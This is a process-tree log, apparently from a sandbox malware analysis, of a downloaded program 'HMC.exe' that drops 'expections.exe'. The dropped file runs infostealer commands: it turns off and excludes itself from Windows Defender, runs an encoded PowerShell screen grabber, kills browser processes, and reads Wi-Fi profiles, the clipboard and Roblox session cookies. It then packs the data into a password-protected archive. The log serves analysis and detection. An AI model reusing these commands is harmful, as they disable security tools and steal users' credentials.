C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:12⤵PID:4876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:12⤵PID:4720
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:12⤵PID:4496
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5948 /prefetch:82⤵PID:5020
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:12⤵PID:5284
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵PID:5840
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5932 /prefetch:82⤵PID:5688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3100 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5140
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2068
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4604
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4836
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\HMC 2.2.1\" -spe -an -ai#7zMap19409:80:7zEvent53341⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2236
-
C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe"C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe"1⤵
- Executes dropped EXE
PID:1512 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DADA.tmp\DADB.tmp\DADC.bat "C:\Users\Admin\Downloads\HMC 2.2.1\HMC.exe""2⤵PID:5060
-
C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe"x64\expections.exe"3⤵
- Executes dropped EXE
PID:4580 -
C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe"x64\expections.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe'"5⤵PID:2724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\HMC 2.2.1\x64\expections.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵PID:432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1780
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1192
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:3808
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵PID:1008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2484
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4468
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5716
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵PID:864
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵PID:5780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4960
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5640 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5704 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3304fzdw\3304fzdw.cmdline"7⤵PID:4276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA18.tmp" "c:\Users\Admin\AppData\Local\Temp\3304fzdw\CSC825DE7F81686453296F1EA4D556419F.TMP"8⤵PID:5648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3856
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2636
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5536
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2272
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5464
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3664"5⤵PID:6004
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36646⤵
- Kills process with taskkill
PID:920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2256"5⤵PID:4512
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22566⤵
- Kills process with taskkill
PID:5724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5372
-
C:\Windows\system32\getmac.exegetmac6⤵PID:1128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1184"5⤵PID:5600
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 11846⤵
- Kills process with taskkill
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2344"5⤵PID:2744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5484
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 23446⤵
- Kills process with taskkill
PID:6044 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4268"5⤵PID:5184
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42686⤵
- Kills process with taskkill
PID:5736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"5⤵PID:5896
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19566⤵
- Kills process with taskkill
PID:5040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3560"5⤵PID:1428
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35606⤵
- Kills process with taskkill
PID:5584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"5⤵PID:4624
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4668
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28726⤵
- Kills process with taskkill
PID:2284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4720"5⤵PID:2632
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47206⤵
- Kills process with taskkill
PID:6096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4496"5⤵PID:3440
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44966⤵
- Kills process with taskkill
PID:5264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2704"5⤵PID:5848
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4960
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27046⤵
- Kills process with taskkill
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5284"5⤵PID:2912
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52846⤵
- Kills process with taskkill
PID:3272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:6044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\34h7w.zip" *"5⤵PID:5356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI45802\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\34h7w.zip" *6⤵
- Executes dropped EXE
PID:5696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:4080
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:2680
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:4832
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:4880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5952
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:5820
-
